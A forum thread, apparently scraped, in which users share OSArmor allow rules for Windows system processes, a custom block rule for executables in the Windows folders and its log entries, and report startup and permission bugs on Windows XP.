[%PROCESS%: C:\Windows\System32\LogonUI.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "LogonUI.exe" /flags:0x0] [%PARENTPROCESS%: C:\Windows\System32\winlogon.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\efsui.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: efsui.exe /efs /keybackup] [%PARENTPROCESS%: C:\Windows\System32\lsass.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\sppsvc.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\sppsvc.exe] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\WerFault.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\WerFault.exe -u -p 1620 -s 988] [%PARENTPROCESS%: C:\Windows\AutoKMS\AutoKMS.exe] [%PARENTFILEPATH%: C:\Windows\AutoKMS\]
[%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\taskhost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: taskhost.exe SYSTEM] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\svchost.exe -k imgsvc] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\System32\svchost.exe -k LocalServicePeerNet] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\wx6t45xs.cmdline"] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
[%PROCESS%: C:\Windows\System32\mobsync.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\System32\mobsync.exe -Embedding] [%PARENTPROCESS%: C:\Windows\System32\svchost.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\cp1ve5kj.cmdline"] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
[%PROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\system32\SearchIndexer.exe /Embedding] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\dulxwqz-.cmdline"] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
[%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 1688 DefaultKMSPID] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Windows\AutoKMS\AutoKMS.exe] [%PARENTFILEPATH%: C:\Windows\AutoKMS\]
[%PROCESS%: C:\Windows\System32\SearchProtocolHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\SearchFilterHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528] [%PARENTPROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\SearchProtocolHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe38_ Global\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"] [%PARENTPROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\SearchFilterHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
[%PROCESS%: C:\Windows\System32\taskmgr.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\taskmgr.exe" /4] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\rundll32.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding] [%PARENTPROCESS%: C:\Windows\System32\svchost.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\rundll32.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\System32\svchost.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\notepad.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\notepad.exe" "C:\Program Files\NoVirusThanks\OSArmorDevSvc\CustomBlock.db"] [%PARENTPROCESS%: C:\Program Files\NoVirusThanks\OSArmorDevSvc\OSArmorDevUI.exe] [%PARENTFILEPATH%: C:\Program Files\NoVirusThanks\OSArmorDevSvc\] [%PARENTSIGNER%: NoVirusThanks Company Srl]
[%PROCESS%: C:\Windows\System32\notepad.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: C:\Windows\System32\svchost.exe -k WerSvcGroup] [%PARENTPROCESS%: C:\Windows\System32\services.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\taskeng.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\System32\svchost.exe] [%PARENTFILEPATH%: C:\Windows\System32\]

Code:

// Block all executable files only in Windows folder and system32 folder
[%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\]
[%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\system32\]

Log:

Code:

Date/Time: 18/01/2018 07:34:15
Process: [3332]C:\Windows\AntiTest.exe
Parent: [420]C:\Windows\explorer.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: "C:\Windows\AntiTest.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 07:34:53
Process: [1896]C:\Windows\System32\AntiTest.exe
Parent: [420]C:\Windows\explorer.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: "C:\Windows\System32\AntiTest.exe"
Signer:
Parent Signer:

Only problems I now have with OSArmor is that I can restart and shutdown Computer, but can't logoff the Computer. Say if I set a password I would be really stuck lol. I'm using my Netbook without Monitor just software running the widescreen 23 inch TV instead! All I get is missing input hahaha.

AeroFit · Jan 18, 2018

AeroFit said: ↑

@novirusthanks
WinXP SP3
On startup there is an error #7009 in system log:
"Timeout (30000 ms) waiting for service connection NoVirusThanks OSArmorDevSvc."
After logon In Services.msc OSArmorDevSvc service is not running but when I manually start it up it's ok and running.

Also when nonadmin user is opening any OSA config window (Main config or exclusions) from OSA's tray icon no settings can be saved because of lack of necessary permissions. So obviously its necessary to call OSA's windows in tray icon through UAC (in WinXP through run as) so user could enter admin creditionals and save config changes successfully.
Click to expand...

@novirusthanks, Test25 still having the same issue on 2 machines with WinXP SP3 and different hardware
Also it's very lacking password protection feature for such functions as "Disable protection" and "Exit GUI"
And of course to change any setting I still have to manually navigate to install folder, Shift + RClick on Configurator, select "Open as..." ...

Log in or Sign up

NoVirusThanks OSArmor: An Additional Layer of Defense

Azure Phoenix Registered Member

bjm_ Registered Member

bjm_ Registered Member

askmark Registered Member

novirusthanks Developer

bjm_ Registered Member

novirusthanks Developer

BlackBox Hacker Guest

bjm_ Registered Member

BlackBox Hacker Guest

novirusthanks Developer

BlackBox Hacker Guest

bjm_ Registered Member

novirusthanks Developer

Peter2150 Global Moderator

Peter2150 Global Moderator

bjm_ Registered Member

novirusthanks Developer

bjm_ Registered Member

Peter2150 Global Moderator

BlackBox Hacker Guest

BlackBox Hacker Guest

bjm_ Registered Member

BlackBox Hacker Guest

AeroFit Registered Member

Log in or Sign up

NoVirusThanks OSArmor: An Additional Layer of Defense

Azure Phoenix Registered Member

bjm_ Registered Member

bjm_ Registered Member

askmark Registered Member

novirusthanks Developer

bjm_ Registered Member

novirusthanks Developer

BlackBox Hacker Guest

bjm_ Registered Member

BlackBox Hacker Guest

novirusthanks Developer

BlackBox Hacker Guest

bjm_ Registered Member

novirusthanks Developer

Peter2150 Global Moderator

Peter2150 Global Moderator

bjm_ Registered Member

novirusthanks Developer

bjm_ Registered Member

Peter2150 Global Moderator

BlackBox Hacker Guest

BlackBox Hacker Guest

bjm_ Registered Member

BlackBox Hacker Guest

AeroFit Registered Member

Useful Searches